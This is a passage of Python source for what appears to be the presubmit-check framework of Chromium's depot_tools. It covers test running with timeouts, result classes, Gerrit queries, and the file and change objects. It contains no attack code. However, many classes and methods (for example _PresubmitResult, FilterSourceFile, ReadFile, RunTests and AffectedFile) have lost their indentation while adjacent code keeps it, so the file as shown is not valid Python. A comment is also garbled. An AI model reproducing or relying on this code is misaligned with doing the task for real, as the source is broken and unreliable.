    self.__got_sigint = False
    # Chain to whatever handler was installed before us.
    self.__previous_signal = signal.signal(signal.SIGINT, self.interrupt)
  def __on_sigint(self):
    # Must be called with self.__lock held.
    self.__got_sigint = True
    while self.__processes:
      try:
        self.__processes.pop().terminate()
      except OSError:
        # The process may already have exited.
        pass
  def interrupt(self, signal_num, frame):
    """SIGINT handler: kill tracked subprocesses, then delegate to the
    previously-installed handler."""
    with self.__lock:
      self.__on_sigint()
    self.__previous_signal(signal_num, frame)
  def got_sigint(self):
    """Returns True once a SIGINT has been seen (main or subprocess)."""
    with self.__lock:
      return self.__got_sigint
  def wait(self, p, stdin):
    """Waits on subprocess p (feeding it stdin); returns (stdout, stderr).

    If a SIGINT has already been seen, p is terminated instead; if p itself
    died from SIGINT, all other tracked processes are terminated.
    """
    with self.__lock:
      if self.__got_sigint:
        p.terminate()
      self.__processes.add(p)
    stdout, stderr = p.communicate(stdin)
    code = p.returncode
    with self.__lock:
      self.__processes.discard(p)
      if code in self.sigint_returncodes:
        self.__on_sigint()
    return stdout, stderr
sigint_handler = SigintHandler()
class Timer(object):
  """Context manager that invokes fn if the with-body outlives timeout
  seconds; self.completed records whether fn fired.  A falsy timeout
  disables the timer entirely."""
  def __init__(self, timeout, fn):
    self.completed = False
    self._fn = fn
    if timeout:
      self._timer = threading.Timer(timeout, self._onTimer)
    else:
      self._timer = None
  def __enter__(self):
    if self._timer is not None:
      self._timer.start()
    return self
  def __exit__(self, _type, _value, _traceback):
    if self._timer is not None:
      self._timer.cancel()
  def _onTimer(self):
    self._fn()
    self.completed = True
class ThreadPool(object):
  """Runs queued CommandData tests, optionally across worker threads."""
  def __init__(self, pool_size=None, timeout=None):
    # Per-test timeout in seconds, or None for no limit.
    self.timeout = timeout
    self._pool_size = pool_size or multiprocessing.cpu_count()
    self._messages = []
    self._messages_lock = threading.Lock()
    self._tests = []
    self._tests_lock = threading.Lock()
    # Tests that must run serially, before the parallel ones.
    self._nonparallel_tests = []
  def _GetCommand(self, test):
    """Returns test.cmd rewritten to run under vpython ('vpython3' for
    python3 tests; '.bat' suffix on Windows)."""
    vpython = 'vpython'
    if test.python3:
      vpython += '3'
    if sys.platform == 'win32':
      vpython += '.bat'
    cmd = test.cmd
    if cmd[0] == 'python':
      cmd = list(cmd)
      cmd[0] = vpython
    elif cmd[0].endswith('.py'):
      cmd = [vpython] + cmd
    # On Windows, scripts on the current directory take precedence over PATH, so
    # that when testing depot_tools on Windows, calling `vpython.bat` will
    # execute the copy of vpython of the depot_tools under test instead of the
    # one in the bot.
    # As a workaround, we run the tests from the parent directory instead.
    if (cmd[0] == vpython and
        'cwd' in test.kwargs and
        os.path.basename(test.kwargs['cwd']) == 'depot_tools'):
      test.kwargs['cwd'] = os.path.dirname(test.kwargs['cwd'])
      cmd[1] = os.path.join('depot_tools', cmd[1])
    return cmd
  def _RunWithTimeout(self, cmd, stdin, kwargs):
    """Runs cmd, returning (returncode, stdout).  On timeout the process is
    terminated and the output is prefixed with a timeout message."""
    p = subprocess.Popen(cmd, **kwargs)
    with Timer(self.timeout, p.terminate) as timer:
      stdout, _ = sigint_handler.wait(p, stdin)
      if timer.completed:
        stdout = 'Process timed out after %ss\n%s' % (self.timeout, stdout)
      return p.returncode, stdout
  def CallCommand(self, test):
    """Runs an external program.
    This function converts invocation of .py files and invocations of 'python'
    to vpython invocations.
    """
    cmd = self._GetCommand(test)
    try:
      start = time_time()
      returncode, stdout = self._RunWithTimeout(cmd, test.stdin, test.kwargs)
      duration = time_time() - start
    except Exception:
      duration = time_time() - start
      return test.message(
          '%s\n%s exec failure (%4.2fs)\n%s' % (
              test.name, ' '.join(cmd), duration, traceback.format_exc()))
    if returncode != 0:
      return test.message(
          '%s\n%s (%4.2fs) failed\n%s' % (
              test.name, ' '.join(cmd), duration, stdout))
    if test.info:
      return test.info('%s\n%s (%4.2fs)' % (test.name, ' '.join(cmd), duration))
  def AddTests(self, tests, parallel=True):
    """Queues tests for RunAsync()."""
    if parallel:
      self._tests.extend(tests)
    else:
      self._nonparallel_tests.extend(tests)
  def RunAsync(self):
    """Runs all queued tests; returns the accumulated result messages."""
    self._messages = []
    def _WorkerFn():
      # Worker loop: pop tests until the shared queue is empty.
      while True:
        test = None
        with self._tests_lock:
          if not self._tests:
            break
          test = self._tests.pop()
        result = self.CallCommand(test)
        if result:
          with self._messages_lock:
            self._messages.append(result)
    def _StartDaemon():
      t = threading.Thread(target=_WorkerFn)
      t.daemon = True
      t.start()
      return t
    # Serial tests run first, on the calling thread.
    while self._nonparallel_tests:
      test = self._nonparallel_tests.pop()
      result = self.CallCommand(test)
      if result:
        self._messages.append(result)
    if self._tests:
      threads = [_StartDaemon() for _ in range(self._pool_size)]
      for worker in threads:
        worker.join()
    return self._messages
def normpath(path):
  '''Version of os.path.normpath that also changes backward slashes to
  forward slashes when not running on Windows.
  '''
  # Pre-converting os.sep to '/' is always safe: the Windows normpath turns
  # forward slashes back into backslashes anyway.
  return os.path.normpath(path.replace(os.sep, '/'))
def _RightHandSideLinesImpl(affected_files):
"""Implements RightHandSideLines for InputApi and GclChange."""
for af in affected_files:
lines = af.ChangedContents()
for line in lines:
yield (af, line[0], line[1])
def prompt_should_continue(prompt_string):
  """Shows prompt_string and reads one line from stdin; returns True iff
  the answer is 'y' or 'yes' (case-insensitive)."""
  sys.stdout.write(prompt_string)
  answer = sys.stdin.readline()
  return answer.strip().lower() in ('y', 'yes')
# Top level object so multiprocessing can pickle
# Public access through OutputApi object.
class _PresubmitResult(object):
"""Base class for result objects."""
fatal = False
should_prompt = False
def __init__(self, message, items=None, long_text=''):
"""
message: A short one-line message to indicate errors.
items: A list of short strings to indicate where errors occurred.
long_text: multi-line text output, e.g. from another tool
"""
self._message = message
self._items = items or []
self._long_text = long_text.rstrip()
def handle(self):
sys.stdout.write(self._message)
sys.stdout.write('\n')
for index, item in enumerate(self._items):
sys.stdout.write(' ')
# Write separately in case it's unicode.
sys.stdout.write(str(item))
if index < len(self._items) - 1:
sys.stdout.write(' \\')
sys.stdout.write('\n')
if self._long_text:
sys.stdout.write('\n***************\n')
# Write separately in case it's unicode.
sys.stdout.write(self._long_text)
sys.stdout.write('\n***************\n')
def json_format(self):
return {
'message': self._message,
'items': [str(item) for item in self._items],
'long_text': self._long_text,
'fatal': self.fatal
}
# Top level object so multiprocessing can pickle
# Public access through OutputApi object.
class _PresubmitError(_PresubmitResult):
  """A hard presubmit error."""
  # Overrides _PresubmitResult.fatal (also reported via json_format()).
  fatal = True
# Top level object so multiprocessing can pickle
# Public access through OutputApi object.
class _PresubmitPromptWarning(_PresubmitResult):
  """A warning that prompts the user if they want to continue."""
  should_prompt = True
# Top level object so multiprocessing can pickle
# Public access through OutputApi object.
class _PresubmitNotifyResult(_PresubmitResult):
  """Just print something to the screen -- but it's not even a warning."""
  # Inherits the non-fatal, non-prompting defaults.
  pass
# Top level object so multiprocessing can pickle
# Public access through OutputApi object.
class _MailTextResult(_PresubmitResult):
  """A warning that should be included in the review request email."""
  def __init__(self, *args, **kwargs):
    # This result type is unsupported; raise the intended error directly.
    # The previous code first called the base initializer without the
    # required 'message' argument, so construction raised TypeError
    # instead of NotImplementedError.
    raise NotImplementedError()
class GerritAccessor(object):
  """Limited Gerrit functionality for canned presubmit checks to work.
  To avoid excessive Gerrit calls, caches the results.
  """
  def __init__(self, host):
    # host: the Gerrit host name.
    self.host = host
    # Maps int(issue) -> change-detail dict, filled lazily.
    self.cache = {}
  def _FetchChangeDetail(self, issue):
    # Separate function to be easily mocked in tests.
    try:
      return gerrit_util.GetChangeDetail(
          self.host, str(issue),
          ['ALL_REVISIONS', 'DETAILED_LABELS', 'ALL_COMMITS'])
    except gerrit_util.GerritError as e:
      if e.http_status == 404:
        raise Exception('Either Gerrit issue %s doesn\'t exist, or '
                        'no credentials to fetch issue details' % issue)
      raise
  def GetChangeInfo(self, issue):
    """Returns labels and all revisions (patchsets) for this issue.
    The result is a dictionary according to Gerrit REST Api.
    https://gerrit-review.googlesource.com/Documentation/rest-api.html
    However, API isn't very clear what's inside, so see tests for example.
    """
    assert issue
    cache_key = int(issue)
    if cache_key not in self.cache:
      self.cache[cache_key] = self._FetchChangeDetail(issue)
    return self.cache[cache_key]
  def GetChangeDescription(self, issue, patchset=None):
    """If patchset is none, fetches current patchset."""
    info = self.GetChangeInfo(issue)
    # info is a reference to cache. We'll modify it here adding description to
    # it to the right patchset, if it is not yet there.
    # Find revision info for the patchset we want.
    if patchset is not None:
      for rev, rev_info in info['revisions'].items():
        if str(rev_info['_number']) == str(patchset):
          break
      else:
        # for/else: no revision matched the requested patchset.
        raise Exception('patchset %s doesn\'t exist in issue %s' % (
            patchset, issue))
    else:
      rev = info['current_revision']
      rev_info = info['revisions'][rev]
    return rev_info['commit']['message']
  def GetDestRef(self, issue):
    """Returns the fully-qualified destination ref of the change."""
    ref = self.GetChangeInfo(issue)['branch']
    if not ref.startswith('refs/'):
      # NOTE: it is possible to create 'refs/x' branch,
      # aka 'refs/heads/refs/x'. However, this is ill-advised.
      ref = 'refs/heads/%s' % ref
    return ref
  def _GetApproversForLabel(self, issue, label):
    # Returns the vote entries at the label's maximum possible value.
    change_info = self.GetChangeInfo(issue)
    label_info = change_info.get('labels', {}).get(label, {})
    values = label_info.get('values', {}).keys()
    if not values:
      return []
    max_value = max(int(v) for v in values)
    return [v for v in label_info.get('all', [])
            if v.get('value', 0) == max_value]
  def IsBotCommitApproved(self, issue):
    """True if anyone has max-voted the Bot-Commit label."""
    return bool(self._GetApproversForLabel(issue, 'Bot-Commit'))
  def IsOwnersOverrideApproved(self, issue):
    """True if anyone has max-voted the Owners-Override label."""
    return bool(self._GetApproversForLabel(issue, 'Owners-Override'))
  def GetChangeOwner(self, issue):
    """Returns the email address of the change owner."""
    return self.GetChangeInfo(issue)['owner']['email']
  def GetChangeReviewers(self, issue, approving_only=True):
    """Returns reviewer emails; only max Code-Review voters when
    approving_only is True."""
    changeinfo = self.GetChangeInfo(issue)
    if approving_only:
      reviewers = self._GetApproversForLabel(issue, 'Code-Review')
    else:
      reviewers = changeinfo.get('reviewers', {}).get('REVIEWER', [])
    return [r.get('email') for r in reviewers]
  def UpdateDescription(self, description, issue):
    """Replaces the change's commit message without sending notifications."""
    gerrit_util.SetCommitMessage(self.host, issue, description, notify='NONE')
class OutputApi(object):
  """An instance of OutputApi gets passed to presubmit scripts so that they
  can output various types of results.
  """
  # Aliases so scripts can write output_api.PresubmitError, etc.
  PresubmitResult = _PresubmitResult
  PresubmitError = _PresubmitError
  PresubmitPromptWarning = _PresubmitPromptWarning
  PresubmitNotifyResult = _PresubmitNotifyResult
  MailTextResult = _MailTextResult
  def __init__(self, is_committing):
    # is_committing: True when the change is being committed, False on upload.
    self.is_committing = is_committing
    # Extra emails to cc, filled by AppendCC().
    self.more_cc = []
  def AppendCC(self, cc):
    """Appends a user to cc for this change."""
    self.more_cc.append(cc)
  def PresubmitPromptOrNotify(self, *args, **kwargs):
    """Warn the user when uploading, but only notify if committing."""
    if self.is_committing:
      return self.PresubmitNotifyResult(*args, **kwargs)
    return self.PresubmitPromptWarning(*args, **kwargs)
class InputApi(object):
"""An instance of this object is passed to presubmit scripts so they can
know stuff about the change they're looking at.
"""
# Method could be a function
# pylint: disable=no-self-use
# File extensions that are considered source files from a style guide
# perspective. Don't modify this list from a presubmit script!
#
# Files without an extension aren't included in the list. If you want to
# filter them as source files, add r'(^|.*?[\\\/])[^.]+$' to the allow list.
# Note that ALL CAPS files are skipped in DEFAULT_FILES_TO_SKIP below.
DEFAULT_FILES_TO_CHECK = (
# C++ and friends
r'.+\.c$', r'.+\.cc$', r'.+\.cpp$', r'.+\.h$', r'.+\.m$', r'.+\.mm$',
r'.+\.inl$', r'.+\.asm$', r'.+\.hxx$', r'.+\.hpp$', r'.+\.s$', r'.+\.S$',
# Scripts
r'.+\.js$', r'.+\.py$', r'.+\.sh$', r'.+\.rb$', r'.+\.pl$', r'.+\.pm$',
# Other
r'.+\.java$', r'.+\.mk$', r'.+\.am$', r'.+\.css$', r'.+\.mojom$',
r'.+\.fidl$'
)
# Path regexp that should be excluded from being considered containing source
# files. Don't modify this list from a presubmit script!
DEFAULT_FILES_TO_SKIP = (
r'testing_support[\\\/]google_appengine[\\\/].*',
r'.*\bexperimental[\\\/].*',
# Exclude third_party/.* but NOT third_party/{WebKit,blink}
# (crbug.com/539768 and crbug.com/836555).
r'.*\bthird_party[\\\/](?!(WebKit|blink)[\\\/]).*',
# Output directories (just in case)
r'.*\bDebug[\\\/].*',
r'.*\bRelease[\\\/].*',
r'.*\bxcodebuild[\\\/].*',
r'.*\bout[\\\/].*',
# All caps files like README and LICENCE.
r'.*\b[A-Z0-9_]{2,}$',
# SCM (can happen in dual SCM configuration). (Slightly over aggressive)
r'(|.*[\\\/])\.git[\\\/].*',
r'(|.*[\\\/])\.svn[\\\/].*',
# There is no point in processing a patch file.
r'.+\.diff$',
r'.+\.patch$',
)
  # TODO(https://crbug.com/1098562): Remove once no longer used
  @property
  def DEFAULT_WHITE_LIST(self):
    # Deprecated alias for DEFAULT_FILES_TO_CHECK.
    return self.DEFAULT_FILES_TO_CHECK
  # TODO(https://crbug.com/1098562): Remove once no longer used
  @DEFAULT_WHITE_LIST.setter
  def DEFAULT_WHITE_LIST(self, value):
    self.DEFAULT_FILES_TO_CHECK = value
  # TODO(https://crbug.com/1098562): Remove once no longer used
  @property
  def DEFAULT_ALLOW_LIST(self):
    # Deprecated alias for DEFAULT_FILES_TO_CHECK.
    return self.DEFAULT_FILES_TO_CHECK
  # TODO(https://crbug.com/1098562): Remove once no longer used
  @DEFAULT_ALLOW_LIST.setter
  def DEFAULT_ALLOW_LIST(self, value):
    self.DEFAULT_FILES_TO_CHECK = value
  # TODO(https://crbug.com/1098562): Remove once no longer used
  @property
  def DEFAULT_BLACK_LIST(self):
    # Deprecated alias for DEFAULT_FILES_TO_SKIP.
    return self.DEFAULT_FILES_TO_SKIP
  # TODO(https://crbug.com/1098562): Remove once no longer used
  @DEFAULT_BLACK_LIST.setter
  def DEFAULT_BLACK_LIST(self, value):
    self.DEFAULT_FILES_TO_SKIP = value
  # TODO(https://crbug.com/1098562): Remove once no longer used
  @property
  def DEFAULT_BLOCK_LIST(self):
    # Deprecated alias for DEFAULT_FILES_TO_SKIP.
    return self.DEFAULT_FILES_TO_SKIP
  # TODO(https://crbug.com/1098562): Remove once no longer used
  @DEFAULT_BLOCK_LIST.setter
  def DEFAULT_BLOCK_LIST(self, value):
    self.DEFAULT_FILES_TO_SKIP = value
  def __init__(self, change, presubmit_path, is_committing,
      verbose, gerrit_obj, dry_run=None, thread_pool=None, parallel=False):
    """Builds an InputApi object.
    Args:
      change: A presubmit.Change object.
      presubmit_path: The path to the presubmit script being processed.
      is_committing: True if the change is about to be committed.
      gerrit_obj: provides basic Gerrit codereview functionality.
      dry_run: if true, some Checks will be skipped.
      parallel: if true, all tests reported via input_api.RunTests for all
                PRESUBMIT files will be run in parallel.
    """
    # Version number of the presubmit_support script.
    self.version = [int(x) for x in __version__.split('.')]
    self.change = change
    self.is_committing = is_committing
    self.gerrit = gerrit_obj
    self.dry_run = dry_run
    self.parallel = parallel
    # The thread pool is shared across PRESUBMIT files when supplied.
    self.thread_pool = thread_pool or ThreadPool()
    # We expose various modules and functions as attributes of the input_api
    # so that presubmit scripts don't have to import them.
    self.ast = ast
    self.basename = os.path.basename
    self.cpplint = cpplint
    self.fnmatch = fnmatch
    self.gclient_paths = gclient_paths
    # TODO(yyanagisawa): stop exposing this when python3 become default.
    # Since python3's tempfile has TemporaryDirectory, we do not need this.
    self.temporary_directory = gclient_utils.temporary_directory
    self.glob = glob.glob
    self.json = json
    self.logging = logging.getLogger('PRESUBMIT')
    self.os_listdir = os.listdir
    self.os_path = os.path
    self.os_stat = os.stat
    self.os_walk = os.walk
    self.re = re
    self.subprocess = subprocess
    self.sys = sys
    self.tempfile = tempfile
    self.time = time
    self.unittest = unittest
    if sys.version_info.major == 2:
      self.urllib2 = urllib2
    self.urllib_request = urllib_request
    self.urllib_error = urllib_error
    self.is_windows = sys.platform == 'win32'
    # Set python_executable to 'vpython' in order to allow scripts in other
    # repos (e.g. src.git) to automatically pick up that repo's .vpython file,
    # instead of inheriting the one in depot_tools.
    self.python_executable = 'vpython'
    self.environ = os.environ
    # InputApi.platform is the platform you're currently running on.
    self.platform = sys.platform
    self.cpu_count = multiprocessing.cpu_count()
    # The local path of the currently-being-processed presubmit script.
    self._current_presubmit_path = os.path.dirname(presubmit_path)
    # We carry the canned checks so presubmit scripts can easily use them.
    self.canned_checks = presubmit_canned_checks
    # Temporary files we must manually remove at the end of a run.
    self._named_temporary_files = []
    # TODO(dpranke): figure out a list of all approved owners for a repo
    # in order to be able to handle wildcard OWNERS files?
    self.owners_db = owners.Database(change.RepositoryRoot(),
                                     fopen=open, os_path=self.os_path)
    self.owners_finder = owners_finder.OwnersFinder
    self.verbose = verbose
    self.Command = CommandData
    # Replace <hash_map> and <hash_set> as headers that need to be included
    # with 'base/containers/hash_tables.h' instead.
    # Access to a protected member _XX of a client class
    # pylint: disable=protected-access
    self.cpplint._re_pattern_templates = [
        (a, b, 'base/containers/hash_tables.h')
        if header in ('<hash_map>', '<hash_set>') else (a, b, header)
        for (a, b, header) in cpplint._re_pattern_templates
    ]
  def SetTimeout(self, timeout):
    # Propagates the per-test timeout (seconds) to the shared thread pool.
    self.thread_pool.timeout = timeout
  def PresubmitLocalPath(self):
    """Returns the local path of the presubmit script currently being run.
    This is useful if you don't want to hard-code absolute paths in the
    presubmit script. For example, It can be used to find another file
    relative to the PRESUBMIT.py script, so the whole tree can be branched and
    the presubmit script still works, without editing its content.
    """
    # Computed once in __init__ as dirname(presubmit_path).
    return self._current_presubmit_path
def AffectedFiles(self, include_deletes=True, file_filter=None):
"""Same as input_api.change.AffectedFiles() except only lists files
(and optionally directories) in the same directory as the current presubmit
script, or subdirectories thereof. Note that files are listed using the OS
path separator, so backslashes are used as separators on Windows.
"""
dir_with_slash = normpath('%s/' % self.PresubmitLocalPath())
if len(dir_with_slash) == 1:
dir_with_slash = ''
return list(filter(
lambda x: normpath(x.AbsoluteLocalPath()).startswith(dir_with_slash),
self.change.AffectedFiles(include_deletes, file_filter)))
  def LocalPaths(self):
    """Returns local paths of input_api.AffectedFiles()."""
    paths = [af.LocalPath() for af in self.AffectedFiles()]
    logging.debug('LocalPaths: %s', paths)
    return paths
  def AbsoluteLocalPaths(self):
    """Returns absolute local paths of input_api.AffectedFiles()."""
    return [af.AbsoluteLocalPath() for af in self.AffectedFiles()]
def AffectedTestableFiles(self, include_deletes=None, **kwargs):
"""Same as input_api.change.AffectedTestableFiles() except only lists files
in the same directory as the current presubmit script, or subdirectories
thereof.
"""
if include_deletes is not None:
warn('AffectedTestableFiles(include_deletes=%s)'
' is deprecated and ignored' % str(include_deletes),
category=DeprecationWarning,
stacklevel=2)
return list(filter(
lambda x: x.IsTestableFile(),
self.AffectedFiles(include_deletes=False, **kwargs)))
  def AffectedTextFiles(self, include_deletes=None):
    """An alias to AffectedTestableFiles for backwards compatibility."""
    return self.AffectedTestableFiles(include_deletes=include_deletes)
def FilterSourceFile(self, affected_file, files_to_check=None,
files_to_skip=None, allow_list=None, block_list=None,
white_list=None, black_list=None):
"""Filters out files that aren't considered 'source file'.
If files_to_check or files_to_skip is None, InputApi.DEFAULT_FILES_TO_CHECK
and InputApi.DEFAULT_FILES_TO_SKIP is used respectively.
The lists will be compiled as regular expression and
AffectedFile.LocalPath() needs to pass both list.
Note: if files_to_check or files_to_skip is not set, and
white_list/allow_list or black_list/block_list is, then those values are
used. This is used for backward compatibility reasons.
Note: Copy-paste this function to suit your needs or use a lambda function.
"""
# TODO(https://crbug.com/1098560): Remove non inclusive parameter names.
if files_to_check is None and (allow_list or white_list):
warn('Use files_to_check in FilterSourceFile')
files_to_check = allow_list or white_list
if files_to_skip is None and (block_list or black_list):
warn('Use files_to_skip in FilterSourceFile')
files_to_skip = block_list or black_list
if files_to_check is None:
files_to_check = self.DEFAULT_FILES_TO_CHECK
if files_to_skip is None:
files_to_skip = self.DEFAULT_FILES_TO_SKIP
def Find(affected_file, items):
local_path = affected_file.LocalPath()
for item in items:
if self.re.match(item, local_path):
return True
return False
return (Find(affected_file, files_to_check) and
not Find(affected_file, files_to_skip))
def AffectedSourceFiles(self, source_file):
"""Filter the list of AffectedTestableFiles by the function source_file.
If source_file is None, InputApi.FilterSourceFile() is used.
"""
if not source_file:
source_file = self.FilterSourceFile
return list(filter(source_file, self.AffectedTestableFiles()))
  def RightHandSideLines(self, source_file_filter=None):
    """An iterator over all text lines in 'new' version of changed files.
    Only lists lines from new or modified text files in the change that are
    contained by the directory of the currently executing presubmit script.
    This is useful for doing line-by-line regex checks, like checking for
    trailing whitespace.
    Yields:
      a 3 tuple:
        the AffectedFile instance of the current file;
        integer line number (1-based); and
        the contents of the line as a string.
    Note: The carriage return (LF or CR) is stripped off.
    """
    files = self.AffectedSourceFiles(source_file_filter)
    return _RightHandSideLinesImpl(files)
def ReadFile(self, file_item, mode='r'):
"""Reads an arbitrary file.
Deny reading anything outside the repository.
"""
if isinstance(file_item, AffectedFile):
file_item = file_item.AbsoluteLocalPath()
if not file_item.startswith(self.change.RepositoryRoot()):
raise IOError('Access outside the repository root is denied.')
return gclient_utils.FileRead(file_item, mode)
def CreateTemporaryFile(self, **kwargs):
"""Returns a named temporary file that must be removed with a call to
RemoveTemporaryFiles().
All keyword arguments are forwarded to tempfile.NamedTemporaryFile(),
except for |delete|, which is always set to False.
Presubmit checks that need to create a temporary file and pass it for
reading should use this function instead of NamedTemporaryFile(), as
Windows fails to open a file that is already open for writing.
with input_api.CreateTemporaryFile() as f:
f.write('xyz')
f.close()
input_api.subprocess.check_output(['script-that', '--reads-from',
f.name])
Note that callers of CreateTemporaryFile() should not worry about removing
any temporary file; this is done transparently by the presubmit handling
code.
"""
if 'delete' in kwargs:
# Prevent users from passing |delete|; we take care of file deletion
# ourselves and this prevents unintuitive error messages when we pass
# delete=False and 'delete' is also in kwargs.
raise TypeError('CreateTemporaryFile() does not take a "delete" '
'argument, file deletion is handled automatically by '
'the same presubmit_support code that creates InputApi '
'objects.')
temp_file = self.tempfile.NamedTemporaryFile(delete=False, **kwargs)
self._named_temporary_files.append(temp_file.name)
return temp_file
@property
def tbr(self):
"""Returns if a change is TBR'ed."""
return 'TBR' in self.change.tags or self.change.TBRsFromDescription()
def RunTests(self, tests_mix, parallel=True):
tests = []
msgs = []
for t in tests_mix:
if isinstance(t, OutputApi.PresubmitResult) and t:
msgs.append(t)
else:
assert issubclass(t.message, _PresubmitResult)
tests.append(t)
if self.verbose:
t.info = _PresubmitNotifyResult
if not t.kwargs.get('cwd'):
t.kwargs['cwd'] = self.PresubmitLocalPath()
self.thread_pool.AddTests(tests, parallel)
# When self.parallel is True (i.e. --parallel is passed as an option)
# RunTests doesn't actually run tests. It adds them to a ThreadPool that
# will run all tests once all PRESUBMIT files are processed.
# Otherwise, it will run them and return the results.
if not self.parallel:
msgs.extend(self.thread_pool.RunAsync())
return msgs
class _DiffCache(object):
"""Caches diffs retrieved from a particular SCM."""
def __init__(self, upstream=None):
"""Stores the upstream revision against which all diffs will be computed."""
self._upstream = upstream
def GetDiff(self, path, local_root):
"""Get the diff for a particular path."""
raise NotImplementedError()
def GetOldContents(self, path, local_root):
"""Get the old version for a particular path."""
raise NotImplementedError()
class _GitDiffCache(_DiffCache):
  """DiffCache implementation for git; gets all file diffs at once."""

  def __init__(self, upstream):
    super(_GitDiffCache, self).__init__(upstream=upstream)
    # Lazily-built map of normalized path -> unified diff text; populated by
    # the first GetDiff() call and reused for every later lookup.
    self._diffs_by_file = None

  def GetDiff(self, path, local_root):
    """Returns the cached git diff for |path|, computing all diffs on first use.

    Raises:
      PresubmitFailure: on an unparseable diff line, or when |path| has no
          entry in the computed diff.
    """
    if not self._diffs_by_file:
      # Compute a single diff for all files and parse the output; should
      # with git this is much faster than computing one diff for each file.
      diffs = {}

      # Don't specify any filenames below, because there are command line length
      # limits on some platforms and GenerateDiff would fail.
      unified_diff = scm.GIT.GenerateDiff(local_root, files=[], full_move=True,
                                          branch=self._upstream)

      # This regex matches the path twice, separated by a space. Note that
      # filename itself may contain spaces.
      file_marker = re.compile('^diff --git (?P<filename>.*) (?P=filename)$')
      current_diff = []
      keep_line_endings = True
      for x in unified_diff.splitlines(keep_line_endings):
        match = file_marker.match(x)
        if match:
          # Marks the start of a new per-file section. Note that current_diff
          # is stored in diffs by reference, so appending below keeps
          # extending the same per-file entry.
          diffs[match.group('filename')] = current_diff = [x]
        elif x.startswith('diff --git'):
          raise PresubmitFailure('Unexpected diff line: %s' % x)
        else:
          current_diff.append(x)

      self._diffs_by_file = dict(
        (normpath(path), ''.join(diff)) for path, diff in diffs.items())

    if path not in self._diffs_by_file:
      raise PresubmitFailure(
          'Unified diff did not contain entry for file %s' % path)

    return self._diffs_by_file[path]

  def GetOldContents(self, path, local_root):
    """Returns the upstream-revision contents of |path| straight from git."""
    return scm.GIT.GetOldContents(local_root, path, branch=self._upstream)
class AffectedFile(object):
"""Representation of a file in a change."""
DIFF_CACHE = _DiffCache
# Method could be a function
# pylint: disable=no-self-use
def __init__(self, path, action, repository_root, diff_cache):
self._path = path
self._action = action
self._local_root = repository_root
self._is_directory = None
self._cached_changed_contents = None
self._cached_new_contents = None
self._diff_cache = diff_cache
logging.debug('%s(%s)', self.__class__.__name__, self._path)
def LocalPath(self):
"""Returns the path of this file on the local disk relative to client root.
This should be used for error messages but not for accessing files,
because presubmit checks are run with CWD=PresubmitLocalPath() (which is
often != client root).
"""
return normpath(self._path)
def AbsoluteLocalPath(self):
"""Returns the absolute path of this file on the local disk.
"""
return os.path.abspath(os.path.join(self._local_root, self.LocalPath()))
def Action(self):
"""Returns the action on this opened file, e.g. A, M, D, etc."""
return self._action
def IsTestableFile(self):
"""Returns True if the file is a text file and not a binary file.
Deleted files are not text file."""
raise NotImplementedError() # Implement when needed
def IsTextFile(self):
"""An alias to IsTestableFile for backwards compatibility."""
return self.IsTestableFile()
def OldContents(self):
"""Returns an iterator over the lines in the old version of file.
The old version is the file before any modifications in the user's
workspace, i.e. the 'left hand side'.
Contents will be empty if the file is a directory or does not exist.
Note: The carriage returns (LF or CR) are stripped off.
"""
return self._diff_cache.GetOldContents(self.LocalPath(),
self._local_root).splitlines()
def NewContents(self):
"""Returns an iterator over the lines in the new version of file.
The new version is the file in the user's workspace, i.e. the 'right hand
side'.
Contents will be empty if the file is a directory or does not exist.
Note: The carriage returns (LF or CR) are stripped off.
"""
if self._cached_new_contents is None:
self._cached_new_contents = []
try:
self._cached_new_contents = gclient_utils.FileRead(
self.AbsoluteLocalPath(), 'rU').splitlines()
except IOError:
pass # File not found? That's fine; maybe it was deleted.
return self._cached_new_contents[:]
def ChangedContents(self):
"""Returns a list of tuples (line number, line text) of all new lines.
This relies on the scm diff output describing each changed code section
with a line of the form
^@@ <old line num>,<old size> <new line num>,<new size> @@$
"""
if self._cached_changed_contents is not None:
return self._cached_changed_contents[:]
self._cached_changed_contents = []
line_num = 0
for line in self.GenerateScmDiff().splitlines():
m = re.match(r'^@@ [0-9\,\+\-]+ \+([0-9]+)\,[0-9]+ @@', line)
if m:
line_num = int(m.groups(1)[0])
continue
if line.startswith('+') and not line.startswith('++'):
self._cached_changed_contents.append((line_num, line[1:]))
if not line.startswith('-'):
line_num += 1
return self._cached_changed_contents[:]
def __str__(self):
return self.LocalPath()
def GenerateScmDiff(self):
return self._diff_cache.GetDiff(self.LocalPath(), self._local_root)
class GitAffectedFile(AffectedFile):
  """Representation of a file in a change out of a git checkout."""
  # Method 'NNN' is abstract in class 'NNN' but is not overridden
  # pylint: disable=abstract-method
  DIFF_CACHE = _GitDiffCache

  def __init__(self, *args, **kwargs):
    AffectedFile.__init__(self, *args, **kwargs)
    self._server_path = None
    # Tri-state cache: None = unknown, then True/False once computed.
    self._is_testable_file = None

  def IsTestableFile(self):
    if self._is_testable_file is None:
      # A deleted file is never testable; short-circuiting also avoids the
      # pointless isfile() stat for deletions.
      self._is_testable_file = (
          self.Action() != 'D' and os.path.isfile(self.AbsoluteLocalPath()))
    return self._is_testable_file
class Change(object):
  """Describe a change.

  Used directly by the presubmit scripts to query the current change being
  tested.

  Instance members:
    tags: Dictionary of KEY=VALUE pairs found in the change description.
    self.KEY: equivalent to tags['KEY']
  """

  _AFFECTED_FILES = AffectedFile

  # Matches key/value (or 'tag') lines in changelist descriptions.
  TAG_LINE_RE = re.compile(
      '^[ \t]*(?P<key>[A-Z][A-Z_0-9]*)[ \t]*=[ \t]*(?P<value>.*?)[ \t]*$')
  scm = ''

  def __init__(
      self, name, description, local_root, files, issue, patchset, author,
      upstream=None):
    if files is None:
      files = []
    self._name = name
    # Convert root into an absolute path.
    self._local_root = os.path.abspath(local_root)
    self._upstream = upstream
    self.issue = issue
    self.patchset = patchset
    self.author_email = author

    self._full_description = ''
    self.tags = {}
    self._description_without_tags = ''
    self.SetDescriptionText(description)

    assert all(
        (isinstance(f, (list, tuple)) and len(f) == 2) for f in files), files

    diff_cache = self._AFFECTED_FILES.DIFF_CACHE(self._upstream)
    self._affected_files = [
        self._AFFECTED_FILES(path, action.strip(), self._local_root, diff_cache)
        for action, path in files
    ]

  def Name(self):
    """Returns the change name."""
    return self._name

  def DescriptionText(self):
    """Returns the user-entered changelist description, minus tags.

    Any line in the user-provided description starting with e.g. 'FOO='
    (whitespace permitted before and around) is considered a tag line. Such
    lines are stripped out of the description this function returns.
    """
    return self._description_without_tags

  def FullDescriptionText(self):
    """Returns the complete changelist description including tags."""
    return self._full_description

